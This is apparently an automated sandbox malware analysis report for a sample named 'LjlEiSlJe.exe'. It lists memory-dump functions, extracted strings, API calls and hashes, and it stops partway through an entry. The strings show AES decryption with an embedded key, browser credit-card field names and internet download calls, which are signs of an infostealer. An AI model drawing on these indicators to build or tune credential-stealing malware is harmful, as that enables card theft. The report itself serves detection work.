Function 00405054 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30c5be6be1bd165d20cdf5343b63082902a19791ee8f9bbaf864f40f15828819
Instruction ID: 4a0f063133b18b2742ef91c38c7b584d6f330c354338132b864cc82b234c34cd
Opcode Fuzzy Hash: 30c5be6be1bd165d20cdf5343b63082902a19791ee8f9bbaf864f40f15828819
Instruction Fuzzy Hash: 12A0026425444296E61097149D4142B22D0A2023403544836D141D1192DE38D945D959

Function 0041CD7B Relevance: 12.8, Strings: 10, Instructions: 328COMMON

Download Yara Rule

Strings

System.Security.Cryptography.RijndaelManaged, xrefs: 00420474
CreateDecryptor, xrefs: 00420663
GGwuAKkseRzHfCtotjmDqsWi, xrefs: 004205A1
8, xrefs: 0041CE9F
keySize, xrefs: 004204CF
Padding, xrefs: 0042051C
TransformFinalBlock, xrefs: 00420763
Mode, xrefs: 00420569
Key, xrefs: 0042061C
2F13133B3B1200132200210B2C06071F, xrefs: 0042057F

Memory Dump Source

Source File: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID: 2F13133B3B1200132200210B2C06071F$8$CreateDecryptor$GGwuAKkseRzHfCtotjmDqsWi$Key$Mode$Padding$System.Security.Cryptography.RijndaelManaged$TransformFinalBlock$keySize
API String ID: 0-472979293
Opcode ID: f6f4fc6d6cddadbfbd4990cc606ebb1e54e75e65755180457b26544043b2dfc9
Instruction ID: eef065e4d8e1d301c8b5f26f56a0540ccfc1639f2296b6cc6a63eba5d1020c8b
Opcode Fuzzy Hash: f6f4fc6d6cddadbfbd4990cc606ebb1e54e75e65755180457b26544043b2dfc9
Instruction Fuzzy Hash: D0F1F6B4900219DFDB14DFA4C988BDDBBB5FF48304F1081AAE50AAB291DB749A85CF54

Function 0041D370 Relevance: 12.8, Strings: 10, Instructions: 326COMMON

Download Yara Rule

Strings

System.Security.Cryptography.RijndaelManaged, xrefs: 00420474
CreateDecryptor, xrefs: 00420663
D, xrefs: 0041D488
GGwuAKkseRzHfCtotjmDqsWi, xrefs: 004205A1
keySize, xrefs: 004204CF
Padding, xrefs: 0042051C
TransformFinalBlock, xrefs: 00420763
Mode, xrefs: 00420569
Key, xrefs: 0042061C
2F13133B3B1200132200210B2C06071F, xrefs: 0042057F

Memory Dump Source

Source File: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID: 2F13133B3B1200132200210B2C06071F$CreateDecryptor$D$GGwuAKkseRzHfCtotjmDqsWi$Key$Mode$Padding$System.Security.Cryptography.RijndaelManaged$TransformFinalBlock$keySize
API String ID: 0-3541494787
Opcode ID: 36ece2e72a4ed34869948ddf5b7f2ce51c81f3080ee0fb9cbd5d6c73b321639a
Instruction ID: 6734c0efabbe8744483827a25aacb494f05ddf19bc3c9d4f2c34be74669d0878
Opcode Fuzzy Hash: 36ece2e72a4ed34869948ddf5b7f2ce51c81f3080ee0fb9cbd5d6c73b321639a
Instruction Fuzzy Hash: 8AE1E6B4D00219DFDB14DFA4C948BDDBBB5FF48304F1081AAE50AAB291DB74AA85CF54

Function 00420410 Relevance: 11.5, Strings: 9, Instructions: 268COMMON

Download Yara Rule

Strings

System.Security.Cryptography.RijndaelManaged, xrefs: 00420474
CreateDecryptor, xrefs: 00420663
GGwuAKkseRzHfCtotjmDqsWi, xrefs: 004205A1
keySize, xrefs: 004204CF
Padding, xrefs: 0042051C
TransformFinalBlock, xrefs: 00420763
Mode, xrefs: 00420569
Key, xrefs: 0042061C
2F13133B3B1200132200210B2C06071F, xrefs: 0042057F

Memory Dump Source

Source File: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID: 2F13133B3B1200132200210B2C06071F$CreateDecryptor$GGwuAKkseRzHfCtotjmDqsWi$Key$Mode$Padding$System.Security.Cryptography.RijndaelManaged$TransformFinalBlock$keySize
API String ID: 0-1767983890
Opcode ID: 20f4ae044a9923172daa9db6eccd33be44b6853e294bc251c2289ddb661aa978
Instruction ID: d8b477002a1c295c739ef38bd42ef7be5558b2b9b3fc5adf7aa80ee4c627a6b7
Opcode Fuzzy Hash: 20f4ae044a9923172daa9db6eccd33be44b6853e294bc251c2289ddb661aa978
Instruction Fuzzy Hash: 38C1F5B4A00209DFDB14DFA4D948B9DBBB5FF48304F10C1AEE50AAB291DB74AA45CF54

Function 00423309 Relevance: 5.2, Strings: 4, Instructions: 243COMMON

Download Yara Rule

Strings

card_number_encrypted, xrefs: 0042366F
[, xrefs: 00423DBA
name_on_card, xrefs: 00423647
expiration_month\expiration_year, xrefs: 0042365B

Memory Dump Source

Source File: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID: [$card_number_encrypted$expiration_month\expiration_year$name_on_card
API String ID: 0-198023536
Opcode ID: 5014981b2c40d13c9677ea95bcc1cae7e08eacd2bd1179efafe47170ccfa0915
Instruction ID: e4c6b3bfec974086a04e62e69102291a8c11e9bf4a3ce8b3a00470d361c18045
Opcode Fuzzy Hash: 5014981b2c40d13c9677ea95bcc1cae7e08eacd2bd1179efafe47170ccfa0915
Instruction Fuzzy Hash: B3C124B59002189FDB25CF54C888BDABBB4BF48304F10C1EAE60EA7251DB749E85CF94

Analysis Process: LjlEiSlJe.exePID: 7584, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	12.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	18
Total number of Limit Nodes:	2

Executed Functions

Function 02778D2C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02778DE9

Strings

6O92, xrefs: 02778D6C

Memory Dump Source

Source File: 0000000B.00000002.2160137564.0000000002770000.00000040.00000800.00020000.00000000.sdmp, Offset: 02770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2770000_LjlEiSlJe.jbxd

Similarity

API ID: Create
String ID: 6O92
API String ID: 2289755597-1234267814
Opcode ID: 0508aaa7eb80f2d4da83d382d745515de2b5271178c905236cc9080ed0380c31
Instruction ID: 9b19f4bd4038b29ddc563957fc225838de9b23456b31dadd0417402bca1e2a0c
Opcode Fuzzy Hash: 0508aaa7eb80f2d4da83d382d745515de2b5271178c905236cc9080ed0380c31
Instruction Fuzzy Hash: 3F41E3B0C00719CFDB24DFA9C944BDEBBB5BF49314F20806AD408AB255DBB5694ACF91

Function 027778BC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02778DE9

Strings

6O92, xrefs: 02778D6C

Memory Dump Source

Source File: 0000000B.00000002.2160137564.0000000002770000.00000040.00000800.00020000.00000000.sdmp, Offset: 02770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2770000_LjlEiSlJe.jbxd

Similarity

API ID: Create
String ID: 6O92
API String ID: 2289755597-1234267814
Opcode ID: b891c2067e9a8f24879fea7ab349049aaf70715fb6912ad977c55afd4fb3d3cd
Instruction ID: 0e8c2a0d126ea66628899a55b105e7cb69baf372199671b54170395cfed938ca
Opcode Fuzzy Hash: b891c2067e9a8f24879fea7ab349049aaf70715fb6912ad977c55afd4fb3d3cd
Instruction Fuzzy Hash: C641E5B0C00719CFDB24DFA9C948B9DBBF5BF49704F20806AD408AB255D7B56945CF91

Function 0277E6D8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0277E73E

Strings

6O92, xrefs: 0277E6F7

Memory Dump Source

Source File: 0000000B.00000002.2160137564.0000000002770000.00000040.00000800.00020000.00000000.sdmp, Offset: 02770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2770000_LjlEiSlJe.jbxd

Similarity

API ID: HandleModule
String ID: 6O92
API String ID: 4139908857-1234267814
Opcode ID: 876c94fc1534b3b494def6c67a62853025f3c92f3e021a45e589c18390c4754f
Instruction ID: e5e206c4654170f140b1820aef7e188f5bea518e1f41f844fb8a728f90f69ba5
Opcode Fuzzy Hash: 876c94fc1534b3b494def6c67a62853025f3c92f3e021a45e589c18390c4754f
Instruction Fuzzy Hash: 14110FB5C0024A8FDB20CF9AC544BDEFBF9EB88214F10846AD519A7200D379A545CFA1

Function 00D4D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2159695494.0000000000D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d4d000_LjlEiSlJe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5903587ab3219860ba88c24a066e470f2d7f95e04814e0ab5920406786358771
Instruction ID: 5dd8720e4e275e9163ee91da830ca5bf33a0982fb52654ed945366f87e3d6240
Opcode Fuzzy Hash: 5903587ab3219860ba88c24a066e470f2d7f95e04814e0ab5920406786358771
Instruction Fuzzy Hash: 40213471604240DFCB05DF14D9C0F26BF66FB98318F24C569E9490B256C73AD816DBB2

Function 0260D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2159827122.000000000260D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0260D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_260d000_LjlEiSlJe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00fec23b2275afa346ab8b2d0d248590dab9fe7f253589d3b1b07dade8d08322
Instruction ID: 2e900658af090a588ca03695ca72cb827f9c0635c7ea122e8150f53ba29ff10d
Opcode Fuzzy Hash: 00fec23b2275afa346ab8b2d0d248590dab9fe7f253589d3b1b07dade8d08322
Instruction Fuzzy Hash: 04210071604280DFDB18DF64D9C0F27BB65EB88314F20C669D80E4B396C33AD407DA62

Function 0260D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2159827122.000000000260D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0260D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_260d000_LjlEiSlJe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87794ea2a7b31d532067a296f13a395a766be2b162b3c25293860d0011277b4f
Instruction ID: e65347f609404b71c7c0924d730fe72a282685bcc5c1e37cde9c59e8039fd088
Opcode Fuzzy Hash: 87794ea2a7b31d532067a296f13a395a766be2b162b3c25293860d0011277b4f
Instruction Fuzzy Hash: 1B2192755093C08FCB06CF64D9D4B16BF71EB46214F28C6DAD8498F6A7C33A940ADB62

Function 00D4D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2159695494.0000000000D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d4d000_LjlEiSlJe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: 2fbc01ff401591f04aa1f218ca12248e24ed6f54ec4d81042925d1c560556d06
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: 40112672504280CFCF02CF10D5C4B16BF72FB98314F28C6A9D8490B256C336D85ACBA2

Analysis Process: LjlEiSlJe.exePID: 7744, Parent PID: 7584COMMON

Execution Graph

Execution Coverage:	20.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	38
Total number of Limit Nodes:	4

Executed Functions

Function 00442F40 Relevance: 15.3, Strings: 11, Instructions: 1594
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0@, xrefs: 004431F8
L@, xrefs: 00444008
h@, xrefs: 004439C7
TX@, xrefs: 00443E7D
|Z@, xrefs: 0044466B
d, xrefs: 0044323C
TX@, xrefs: 00443FC5
X@, xrefs: 00443ECD
TX@, xrefs: 0044419B
L@, xrefs: 00443E6D
|Z@, xrefs: 004446F2

Memory Dump Source

Source File: 0000000E.00000002.3286693348.0000000000442000.00000040.00000400.00020000.00000000.sdmp, Offset: 00442000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_442000_LjlEiSlJe.jbxd

Similarity

API ID:
String ID: 0@$L@$L@$TX@$TX@$TX@$X@$d$h@$|Z@$|Z@
API String ID: 0-992134375
Opcode ID: 4e454967fc4c911b5043095494286913c312f81f367a1349d43e103f2b3f7920
Instruction ID: 39b91933144ae9890703be3615fac9a49a28ec2e6ba9e5a0252ef8fc625ba246
Opcode Fuzzy Hash: 4e454967fc4c911b5043095494286913c312f81f367a1349d43e103f2b3f7920
Instruction Fuzzy Hash: 89E2ECB1D002199FDB25DB65CC85BEEB7B8FF48300F1085EAE50EA6150EA745E89CF64

Function 00444730 Relevance: 12.4, Strings: 9, Instructions: 1177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

E, xrefs: 00445AE8
t@, xrefs: 0044581F, 004458CC
(@, xrefs: 00444D66
d, xrefs: 00444FB4
`7@, xrefs: 00444759
TX@, xrefs: 004459CC
TX@, xrefs: 004459E0
@, xrefs: 00444F68
h@, xrefs: 00444E36

Memory Dump Source

Source File: 0000000E.00000002.3286693348.0000000000442000.00000040.00000400.00020000.00000000.sdmp, Offset: 00442000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_442000_LjlEiSlJe.jbxd

Similarity

API ID:
String ID: (@$E$TX@$TX@$`7@$d$h@$t@$@
API String ID: 0-658975200
Opcode ID: 9bc1e3775bfceaecc3371ea2de68a64513e04046760fc273336e5ffe28d8504b
Instruction ID: ff3d3ff346b0417cf66589cb3514612c06a373764a037f2f6ab34170f2479345
Opcode Fuzzy Hash: 9bc1e3775bfceaecc3371ea2de68a64513e04046760fc273336e5ffe28d8504b
Instruction Fuzzy Hash: 06C22AB5900219DFDB24DFA0DD48BDEB7B4BB48304F0081EAE54AA7261DB745A89CF54

Function 00438F50 Relevance: 12.2, APIs: 1, Strings: 6, Instructions: 1669
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

<dX, xrefs: 0043A3DD
00@, xrefs: 00438F79
D]@, xrefs: 00439475
D]@, xrefs: 004391BF
|Z@, xrefs: 0043A75E
D]@, xrefs: 004395E8

Memory Dump Source

Source File: 0000000E.00000002.3286693348.0000000000431000.00000040.00000400.00020000.00000000.sdmp, Offset: 00431000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_431000_LjlEiSlJe.jbxd

Similarity

API ID:
String ID: 00@$<dX$D]@$D]@$D]@$|Z@
API String ID: 0-1162335648
Opcode ID: 104561cdece89a1fc929e0e0902cf442973d8b1fc7574a7059a442acecf848cf
Instruction ID: 5c0abecbabf853c67e8969e287a294c58d2af844a4c006ff4283ed716006dbb0
Opcode Fuzzy Hash: 104561cdece89a1fc929e0e0902cf442973d8b1fc7574a7059a442acecf848cf
Instruction Fuzzy Hash: B0F2E576D00218DBDB04DFD0DD98ADEB7B9BF48304F10816AE506BB264EB746A4ACF54

Function 00438C60 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 236
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(00000000), ref: 00438D27
InternetOpenUrlA.WININET(00000000,00000000,?,00000000,00000000,04000000,00000000), ref: 00438D75
InternetReadFile.WININET(?,00000000), ref: 00438E22

Strings

0@, xrefs: 00438C82
0@, xrefs: 00438D58, 00438D81, 00438D85
@1@, xrefs: 00438C7C

Memory Dump Source

Source File: 0000000E.00000002.3286693348.0000000000431000.00000040.00000400.00020000.00000000.sdmp, Offset: 00431000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_431000_LjlEiSlJe.jbxd

Similarity

API ID: Internet$Open$FileRead
String ID: 0@$ 0@$@1@
API String ID: 72386350-1513703003
Opcode ID: 29444823e92766862996c0df46818f52becfe30555634452582dc1f798429e4a
Instruction ID: a211c1ecdf17853b9804a5476b61874acaa79de5b15ed49f39e712b25193d4ac
Opcode Fuzzy Hash: 29444823e92766862996c0df46818f52becfe30555634452582dc1f798429e4a
Instruction Fuzzy Hash: 0D81ED71900209AFDB04EBE4DD85EEEBBBDEF98704F10801AF605B72A0DA745945CF64

Function 004122D1 Relevance: 8.1, Strings: 6, Instructions: 605
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

t, xrefs: 004122FA
v, xrefs: 0041233E
xj@, xrefs: 00412BDE
$j@, xrefs: 004128A7
xj@, xrefs: 004128D2
$j@, xrefs: 00412BB3

Memory Dump Source

Source File: 0000000E.00000002.3286693348.0000000000412000.00000040.00000400.00020000.00000000.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_412000_LjlEiSlJe.jbxd

Similarity

API ID:
String ID: $j@$$j@$t$v$xj@$xj@
API String ID: 0-3232034566
Opcode ID: ef010a5a574c06ee667d713aa06c90f2cc943b0d9a5ad2edb53dbfe9d4f11361
Instruction ID: e5ba6e6cb2b699ecc881069874b4a34d11ff7c71a999630db07e31940411210c
Opcode Fuzzy Hash: ef010a5a574c06ee667d713aa06c90f2cc943b0d9a5ad2edb53dbfe9d4f11361
Instruction Fuzzy Hash: AD520774A10218DFDB24DF54DE88BDDB7B5BB45300F1081AAE50AA72A0DB745AC9CF58

Function 00445C30 Relevance: 8.0, Strings: 6, Instructions: 465
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

t@, xrefs: 00445C8B
$@, xrefs: 00445F71
T@, xrefs: 00445E46
T@, xrefs: 00445F93
d, xrefs: 0044615F
$@, xrefs: 00445E24

Memory Dump Source

Source File: 0000000E.00000002.3286693348.0000000000442000.00000040.00000400.00020000.00000000.sdmp, Offset: 00442000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_442000_LjlEiSlJe.jbxd

Similarity

API ID:
String ID: $@$$@$T@$T@$d$t@
API String ID: 0-3973645323
Opcode ID: 16f06a4168e11c06959bffe64fd452b09f318fac28fc438622c579b519ef1f7d
Instruction ID: dd7808f41fa8c0eeeb8498d0c7b95f39f6eab288042ebefad56573b5168ff57f
Opcode Fuzzy Hash: 16f06a4168e11c06959bffe64fd452b09f318fac28fc438622c579b519ef1f7d
Instruction Fuzzy Hash: 012207B5D00208DBDB14DFE0DD48BEEB7B8BB48304F10856AE506BB2A4EB745A49CF54

Function 004466A0 Relevance: 6.6, Strings: 5, Instructions: 379
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d@, xrefs: 00446B32
6:@, xrefs: 004465D9, 00446606, 004466BD
h9@, xrefs: 004466C2
:@, xrefs: 00446AE2
x9@, xrefs: 004467C9

Memory Dump Source

Source File: 0000000E.00000002.3286693348.0000000000442000.00000040.00000400.00020000.00000000.sdmp, Offset: 00442000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_442000_LjlEiSlJe.jbxd

Similarity

API ID:
String ID: :@$6:@$d@$h9@$x9@
API String ID: 0-3421527952
Opcode ID: f7544d22d257d40a96506686a59b54087a926332481d7e346fe5260f66b20d64
Instruction ID: 34aa50007acdacc8d32c1ec98c6ebaf17dc71d2c7c4a4042aa61098ca82e7986
Opcode Fuzzy Hash: f7544d22d257d40a96506686a59b54087a926332481d7e346fe5260f66b20d64
Instruction Fuzzy Hash: D3E10AB1D00208EFDB04EFA4D989ADEBBB8FF48705F10416AE506B7290DB785A45CF65

Function 00412670 Relevance: 5.5, Strings: 4, Instructions: 506
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

xj@, xrefs: 00412BDE
$j@, xrefs: 004128A7
xj@, xrefs: 004128D2
$j@, xrefs: 00412BB3

Memory Dump Source

Source File: 0000000E.00000002.3286693348.0000000000412000.00000040.00000400.00020000.00000000.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_412000_LjlEiSlJe.jbxd

Similarity

API ID:
String ID: $j@$$j@$xj@$xj@
API String ID: 0-3430109894
Opcode ID: e59d150365dd472f233061b49891306d6fdedd79a9b5e89ac03b1dff0de763dd
Instruction ID: edaec51679ca109fb96a51359c0fe490e13ab6089511cab5ae9a5bfd84d3543f
Opcode Fuzzy Hash: e59d150365dd472f233061b49891306d6fdedd79a9b5e89ac03b1dff0de763dd
Instruction Fuzzy Hash: 35421874910218CFDB24DF64DE88BDDB7B5BB49300F1081AAE50AB72A0DB745AC9CF59

Function 0041270E Relevance: 5.4, Strings: 4, Instructions: 443
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

xj@, xrefs: 00412BDE
$j@, xrefs: 004128A7
xj@, xrefs: 004128D2
$j@, xrefs: 00412BB3

Memory Dump Source

Source File: 0000000E.00000002.3286693348.0000000000412000.00000040.00000400.00020000.00000000.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_412000_LjlEiSlJe.jbxd

Similarity

API ID:
String ID: $j@$$j@$xj@$xj@
API String ID: 0-3430109894
Opcode ID: 5af31583bc02ed2febc26dce4d1d65830e6fe92041afa15412615c0c62bdb5d7
Instruction ID: fa752dc590dbe5a3adeba5e8ffd65862ff9d84d8828c21d4cc8f6aaf20fdc491
Opcode Fuzzy Hash: 5af31583bc02ed2febc26dce4d1d65830e6fe92041afa15412615c0c62bdb5d7
Instruction Fuzzy Hash: 6322F774A10219DFDB24DF54DE84BEAB7B5BB49300F1081AAE40AB7260DB745EC9CF58

Function 00412872 Relevance: 5.4, Strings: 4, Instructions: 383
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

xj@, xrefs: 00412BDE
$j@, xrefs: 004128A7
xj@, xrefs: 004128D2
